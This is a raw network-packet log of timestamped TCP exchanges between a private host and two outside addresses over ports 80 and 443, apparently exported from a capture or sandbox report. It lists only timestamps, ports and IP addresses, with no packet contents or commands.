Sep 4, 2024 17:37:09.826328039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826339006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826349020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826358080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826364994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.826380968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.826406002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.827343941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.827357054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.827367067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.827387094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.827398062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.827424049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.827436924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.827446938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.827456951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.827457905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.827469110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.827482939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.827507019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.828721046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.828732014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.828742981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.828766108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.828785896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.828857899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.828871965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.828883886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.828893900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.828896999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.828917980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.828941107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.829894066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.829915047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.829926968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.829938889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.829960108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.829991102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.830002069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.830010891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.830020905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.830032110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.830050945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.830074072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.830955982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.830976963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.830986023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.831010103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.831029892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.831105947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.831116915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.831125021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.831141949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.831165075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.831235886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.831248045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.831270933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.831290960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.832081079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832092047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832101107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832129955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.832154989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.832209110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832221031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832228899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832248926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.832261086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.832339048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832350016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832377911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.832396984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.832711935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.832758904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833003044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833013058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833085060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833090067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833153009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833183050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833194017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833204031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833214045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833229065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833237886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833256960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833262920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833272934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833300114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833344936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833354950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833379984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833416939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833429098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833437920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833446980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833453894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833472967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833493948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833523035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833558083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833647966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833659887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833668947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833678961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833688021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833688021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833690882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833703041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.833705902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833733082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.833751917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.876905918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.876931906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.876940966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.876977921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.876991987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.876991987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877005100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877013922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877023935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877026081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877034903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877052069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877074003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877108097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877121925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877142906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877165079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877196074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877204895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877214909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877226114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877230883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877238035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877259970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877341986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877353907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877362967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877373934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877377033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877384901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877393961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877397060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877403975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877418995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877429008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877438068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.877450943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.877480030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.888745070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888753891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888762951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888798952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888812065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888817072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.888822079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888833046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888835907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.888854027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.888879061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888881922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.888915062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.888983965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.888994932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889008999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889018059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889020920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889028072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889030933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889038086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889048100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889049053 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889060020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889086008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889153957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889164925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889173985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889183998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889185905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889214993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889225006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889301062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889312029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889321089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889332056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889341116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889343023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889352083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889358044 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889373064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889384031 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889388084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889406919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889425993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889563084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889574051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889583111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889591932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889601946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889604092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889614105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889624119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889626980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889636040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889648914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889655113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889678955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889755964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889766932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889786959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889797926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889844894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889854908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889863014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889873028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889882088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889884949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889892101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.889908075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.889918089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890084028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890130043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890176058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890186071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890196085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890207052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890212059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890216112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890225887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890228987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890253067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890256882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890265942 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890273094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890284061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890300035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890311956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890361071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890371084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890379906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890394926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890396118 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890417099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890441895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890450954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890461922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890470982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890487909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890487909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890518904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890539885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890551090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890558958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890568972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890573978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890578985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890578985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890585899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890608072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890616894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890836000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890846968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890856028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890865088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890875101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890877008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890886068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890896082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890901089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890911102 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890930891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890939951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890949965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890957117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890965939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890974998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890979052 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890985966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.890986919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.890995979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891005993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891010046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.891016960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891027927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891031981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.891037941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891050100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.891056061 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.891082048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.891797066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891808987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891818047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891838074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.891848087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.891865015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.891969919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891980886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.891989946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.892004013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.892011881 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.892034054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.892052889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.896682978 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.896703005 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.896744967 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.896753073 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.896774054 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.896791935 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.896945000 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.896960974 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.896990061 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.896995068 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.897018909 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.897032022 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.897342920 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.897361994 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.897391081 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.897397995 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.897430897 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.897454977 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.899132967 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.899147034 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.899184942 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.899192095 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.899211884 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.899230003 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.899492979 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.899507999 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.899538994 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.899544954 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.899565935 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.899574995 CEST	49727	443	192.168.2.6	158.69.225.124
